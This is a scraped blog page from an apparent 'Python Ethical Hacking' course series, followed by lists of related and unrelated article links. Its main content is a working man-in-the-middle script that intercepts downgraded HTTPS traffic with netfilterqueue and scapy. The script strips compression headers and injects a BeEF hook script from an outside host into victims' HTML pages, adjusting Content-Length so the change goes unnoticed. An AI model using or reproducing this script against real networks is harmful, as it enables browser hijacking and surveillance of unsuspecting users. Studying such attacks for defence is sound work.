Injecting Code in HTTPS Pages:

#!/usr/bin/env python

import re

from netfilterqueue import NetfilterQueue

from scapy.layers.inet import TCP, IP

from scapy.packet import Raw

def set_load(packet, load):

    packet[Raw].load = load

    del packet[IP].len

    del packet[IP].chksum

    del packet[TCP].chksum

    return packet

def process_packet(packet):

    scapy_packet = IP(packet.get_payload())

    if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):

        load = scapy_packet[Raw].load

        if scapy_packet[TCP].dport == 10000:

            print("[+] Request")

            print(scapy_packet.show())

            load = re.sub(b"Accept-Encoding:.*?\\r\\n", b"", load)

            load = load.replace("HTTP/1.1", "HTTP/1.0")

        elif scapy_packet[TCP].sport == 10000:

            print("[+] Response")

            injection_code = b'<script src="http://10.0.0.43:3000/hook.js"></script>'

            load = load.replace(b"</body>", injection_code + b"</body>")

            content_length_search = re.search(b"(?:Content-Length:\s)(\d*)", load)

            if content_length_search and b"text/html" in load:

                print(content_length_search)

                content_length = content_length_search.group(1)

                new_content_length = int(content_length) + len(injection_code)

                load = load.replace(content_length, str(new_content_length).encode())

        if load != scapy_packet[Raw].load:

            print("Payload")

            new_packet = set_load(scapy_packet, load)

            print(str(new_packet))

            packet.set_payload(str(new_packet).encode())

    packet.accept()

queue = NetfilterQueue()

queue.bind(0, process_packet)

try:

    queue.run()

except KeyboardInterrupt:

    print('')

Python Ethical Hacking - Bypass HTTPS(2)的更多相关文章

  1. Python Ethical Hacking - Bypass HTTPS(1)

    HTTPS: Problem: Data in HTTP is sent as plain text. A MITM can read and edit requests and responses. ...

  2. Python Ethical Hacking - MAC Address & How to Change(1)

    MAC ADDRESS Media Access Control Permanent Physical Unique Assigned by manufacturer WHY CHANGE THE M ...

  3. Python Ethical Hacking - NETWORK_SCANNER(1)

    NETWORK_SCANNER Discover all devices on the network. Display their IP address. Display their MAC add ...

  4. Python Ethical Hacking - MAC Address & How to Change(3)

    SIMPLE ALGORITHM Goal  -> Check if MAC address was changed. Steps: 1. Execute and read ifconfig. ...

  5. Python Ethical Hacking - The Lab and Needed Software

    The Lab and Needed Software Attacker Machine - Kali Linux https://www.kali.org/ 1. Install the softw ...

  6. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(2)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  7. Python Ethical Hacking - MODIFYING DATA IN HTTP LAYER(1)

    MODIFYING DATA IN HTTP LAYER Edit requests/responses. Replace download requests. Inject code(html/Ja ...

  8. Python Ethical Hacking - DNS Spoofing

    What is DNS Spoofing Sniff the DNSRR packet and show on the terminal. #!/usr/bin/env python from net ...

  9. Python Ethical Hacking - Intercepting and Modifying Packets

    INTERCEPTING & MODIFYING PACKETS Scapy can be used to: Create packets. Analyze packets. Send/rec ...

随机推荐

  1. cb23a_c++_标准模板库STL_set_multiset_关联容器

    cb23a_c++_标准模板库STL_set_multiset_关联容器 set(集)数据不能重复.multiset(多集)可以重复.操作数据速度快,数据自动排序.红黑树(数据结构)红黑树-二叉树基本 ...

  2. spring框架中JDK和CGLIB动态代理区别

    转载:https://blog.csdn.net/yhl_jxy/article/details/80635012 前言JDK动态代理实现原理(jdk8):https://blog.csdn.net/ ...

  3. SQL注入入门

    这几天做了不少SQL注入题,对SQL注入有点体会,所以写写自己的学习历程与体会. 什么是SQL注入 SQL注入就是指web程序对用户输入的数据的合法性没有进行判断,由前端传入的参数带着攻击者控制的非法 ...

  4. xeus-clickhouse: Jupyter 的 ClickHouse 内核

    在科学计算领域,Jupyter 是一个使用非常广泛的集成开发环境,它支持多种主流的编程语言比如 Python, C++, R 或者 Julia.同时,数据科学最重要的还是数据,而 SQL 是操作数据最 ...

  5. MongoDB快速入门教程 (4.2)

    4.2.Mongoose实现增删查改 中文文档地址: https://cn.mongoosedoc.top/docs/guide.html 4.2.1.Mongoose是什么? Mongoose是Mo ...

  6. VS2017 快捷键

    VS2017注释:先CTRL+K 然后CTRL+C   (ctrl按住不松,松开k按c) 取消注释:先CTRL+K,然后CTRL+U  (ctrl按住不松,松开k按c)

  7. 注册中心(Eureka/Consul)

    基于SpringBoot1.5.4与SpringCloud(Dalston.SR2)的SpringCloud学习博客,转载请标明出处,O(∩_∩)O谢谢 - Spring Cloud简介 Spring ...

  8. Python-使用tkinter canvas绘制的电子时钟

    #!/usr/bin/env python # -*- coding: utf-8 -*- from tkinter import * import math import threading imp ...

  9. web页面弹出遮罩层,通过js或css禁止蒙层底部页面跟随滚动

    场景概述 弹窗是一种常见的交互方式,而蒙层是弹窗必不可少的元素,用于隔断页面与弹窗区块,暂时阻断页面的交互.但是,在蒙层元素中滑动的时候,滑到内容的尽头时,再继续滑动,蒙层底部的页面会开始滚动,显然这 ...

  10. SQL基础随记2 视图 存储过程

    SQL基础随记2 视图 存储过程   View CREATE/ALTER/DROP VIEW ViewName as SELECT(...) 可以在视图的基础上继续创建视图,即,将之前创建的视图当做表 ...